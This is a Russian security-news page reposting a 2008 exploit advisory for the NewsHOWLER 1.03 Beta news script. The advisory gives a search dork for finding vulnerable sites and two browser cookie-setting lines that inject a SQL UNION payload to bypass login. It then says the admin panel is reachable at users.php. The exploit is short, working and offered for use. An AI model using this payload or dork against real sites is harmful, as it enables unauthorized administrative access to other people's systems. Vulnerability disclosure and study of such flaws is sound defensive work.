Информационная безопасность

Уведомление о безопасности: NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

  PHP Live Helper <= 2.0.1 Multiple Vulnerabilities

  munky-bliki lfi

  Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani

From:r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date:18 августа 2008 г.
Subject:NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

#################################################################################
####
####           NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection            ####
#################################################################################
####
#                                                                                  
 #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#################################################################################
####
#                                                                                  
 #
#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz
#                                                                                  
 #
#DORK : "Net Dupe © 2002. All Rights Reserved"                                      #
#                                                                                  
 #
#################################################################################
####
#                                   [Exploit]                                       #
#                                                                                  
 #
#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
#javascript:document.cookie = "news_password=3; path=/";                            #
#                                                                                  
 #
#Then if u open http://Site/users.php u can see the admin panel ;)                  #
#                                                                                  
 #
#################################################################################
####
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server